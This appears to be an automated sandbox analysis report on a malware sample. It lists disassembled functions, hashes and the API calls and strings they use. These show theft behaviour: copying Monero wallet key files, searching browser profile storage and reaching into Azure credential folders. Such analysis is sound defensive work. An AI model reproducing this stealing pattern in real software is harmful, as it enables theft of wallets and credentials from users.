                                • Instruction Fuzzy Hash: E231F8F294C3049FF304AE28DCC1BBAB7E5EB54351F1A492DE6C582684E67A18458747
                                Function 00DFFA3D Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a009fb6e9687d7af4e793eff8f81060a959e7947603f79509e85f7b16a92c575
                                • Instruction ID: 8663a5b4f1f773975d6a3fa1f867c71c64106356b57fd0dc5d7dc17c2cf0ee68
                                • Opcode Fuzzy Hash: a009fb6e9687d7af4e793eff8f81060a959e7947603f79509e85f7b16a92c575
                                • Instruction Fuzzy Hash: 0D1114B280C604DFE7027F68DC862AAFBE0FF18310F06092DD6E583610E735A9509B87
                                Function 009C85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 009C86AA
                                • StrStrA.SHLWAPI(?,010CEBE8), ref: 009C86CF
                                • lstrcpyn.KERNEL32(00BE93D0,?,00000000), ref: 009C86EE
                                • lstrlen.KERNEL32(?), ref: 009C8701
                                • wsprintfA.USER32 ref: 009C8711
                                • lstrcpy.KERNEL32(?,?), ref: 009C8727
                                • StrStrA.SHLWAPI(?,010CEC00), ref: 009C8754
                                • lstrcpy.KERNEL32(?,00BE93D0), ref: 009C87B4
                                • StrStrA.SHLWAPI(?,010CEC90), ref: 009C87E1
                                • lstrcpyn.KERNEL32(00BE93D0,?,00000000), ref: 009C8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: cc8bb12ae5fd2671ef40fa7b1d11eb31204aebb23b1905d852918b5781f37166
                                • Instruction ID: 99787e9a33067090159b29c7d0e035cdf09518aa3bf0918e690f144e05520c90
                                • Opcode Fuzzy Hash: cc8bb12ae5fd2671ef40fa7b1d11eb31204aebb23b1905d852918b5781f37166
                                • Instruction Fuzzy Hash: F9F17D72900554AFCB11DB64DD88AEBB7B9EF88700F114999F90AE7351DF30AE05CBA1
                                Function 009B1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1F9F
                                • lstrlen.KERNEL32(010C88C8), ref: 009B1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1FE3
                                • lstrlen.KERNEL32(009E1794), ref: 009B1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B200E
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B204D
                                • lstrlen.KERNEL32(009E1794), ref: 009B2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2075
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B20AC
                                • lstrlen.KERNEL32(?), ref: 009B20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2104
                                • lstrcat.KERNEL32(00000000,?), ref: 009B2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2139
                                • lstrlen.KERNEL32(009E1794), ref: 009B214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B216B
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B21D4
                                • lstrlen.KERNEL32(?), ref: 009B21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B220A
                                • lstrcat.KERNEL32(00000000,?), ref: 009B2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2242
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B227F
                                • lstrlen.KERNEL32(010CD280), ref: 009B228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B22B1
                                • lstrcat.KERNEL32(00000000,010CD280), ref: 009B22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B22F7
                                • lstrcat.KERNEL32(00000000), ref: 009B2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009B2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 009B23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009B2444
                                • FindClose.KERNEL32(00000000), ref: 009B2453
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: d7e082215dfe9645c1ccac08c622d2394d5bf59129bc35f7b06716e81db2774f
                                • Instruction ID: ad07fddab8dedfd5ea4a77a9b8340eb0196b9976169540a408e09d6887ab48de
                                • Opcode Fuzzy Hash: d7e082215dfe9645c1ccac08c622d2394d5bf59129bc35f7b06716e81db2774f
                                • Instruction Fuzzy Hash: C7E15E31A1165A9BDB21EFA4DF89BEE77B9EF84720F044424F809AB251DB34DD05CB90
                                Function 009C6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6445
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009C64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 05a0015fa58356839f6bff9cd3b718469cdb725b2b0e5276a968727e0f329919
                                • Instruction ID: a4b15de091c373555ca68dd380a7d9bad3f976a6ae191533356ba6c787f1c6fb
                                • Opcode Fuzzy Hash: 05a0015fa58356839f6bff9cd3b718469cdb725b2b0e5276a968727e0f329919
                                • Instruction Fuzzy Hash: 22F1AF70D012469BDB21EF78DA89BAE77B9EF84310F144428F845EB291DB34DD45CB92
                                Function 009C4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C43A3
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 009C4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 009C443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 009C44DF
                                • lstrlen.KERNEL32(009E1794), ref: 009C44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4507
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 009C451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 009C4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009C45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C467B
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: f73fb6e9c8df98d0e66e73506f2e8fb616d5dcd5bab01dad05ac353f691d29ce
                                • Instruction ID: b551fb291303703ad9671bb95ae76196988194cc8cf377e3324c92dd9c46ecaa
                                • Opcode Fuzzy Hash: f73fb6e9c8df98d0e66e73506f2e8fb616d5dcd5bab01dad05ac353f691d29ce
                                • Instruction Fuzzy Hash: F3B17F71A116469BDB21EFB8DF99BAE77ADEF84310F140028B845E7291DB30DD058B92
                                Function 009C57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009C5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C58F8
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5988
                                • lstrlen.KERNEL32(009E1794), ref: 009C599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C59B9
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C59C5
                                • lstrlen.KERNEL32(010CD1A8), ref: 009C59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009C5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5BB5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 2a280c4ee5f5f8db12d1d6ba2dd3ca4978ce077477d9a28a11e732ba155fe402
                                • Instruction ID: 9b37d2039c77363fe09241c8db43d7d62adfe3c1b2f5dbb93f998381020518a1
                                • Opcode Fuzzy Hash: 2a280c4ee5f5f8db12d1d6ba2dd3ca4978ce077477d9a28a11e732ba155fe402
                                • Instruction Fuzzy Hash: CE02B470D016059BDB21EF68CA89FEE7BB9EF84310F554128F805A7251DB34EC85CB91
                                Function 009B1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009B1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B1135
                                  • Part of subcall function 009B1120: RtlAllocateHeap.NTDLL(00000000), ref: 009B113C
                                  • Part of subcall function 009B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 009B1159
                                  • Part of subcall function 009B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 009B1173
                                  • Part of subcall function 009B1120: RegCloseKey.ADVAPI32(?), ref: 009B117D
                                • lstrcat.KERNEL32(?,00000000), ref: 009B11C0
                                • lstrlen.KERNEL32(?), ref: 009B11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 009B11E8
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B121F
                                • lstrlen.KERNEL32(010C88C8), ref: 009B122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1251
                                • lstrcat.KERNEL32(00000000,010C88C8), ref: 009B1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 009B1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 009B1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B12BA
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B12FF
                                • lstrlen.KERNEL32(010CD280), ref: 009B130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1335
                                • lstrcat.KERNEL32(00000000,?), ref: 009B133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B1378
                                • lstrcat.KERNEL32(00000000), ref: 009B1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009B13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B143D
                                  • Part of subcall function 009CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 009CEE12
                                • DeleteFileA.KERNEL32(?), ref: 009B1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: b9953572505d70d5136f1cd807f98349690f85bc2f021091fd33595350ffc693
                                • Instruction ID: 50cd4e4e0d4ab26c63d80eb814616956c31af8b6490795c5a499280d0a3c6ad3
                                • Opcode Fuzzy Hash: b9953572505d70d5136f1cd807f98349690f85bc2f021091fd33595350ffc693
                                • Instruction Fuzzy Hash: 78A16D71A11206ABDB21EFA4DE99BEE77B9EF84320F444024F905E7251EF30DD458B90
                                Function 009CE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 009CE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009CE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 009CE7C6
                                • memset.MSVCRT ref: 009CE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009CE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE85F
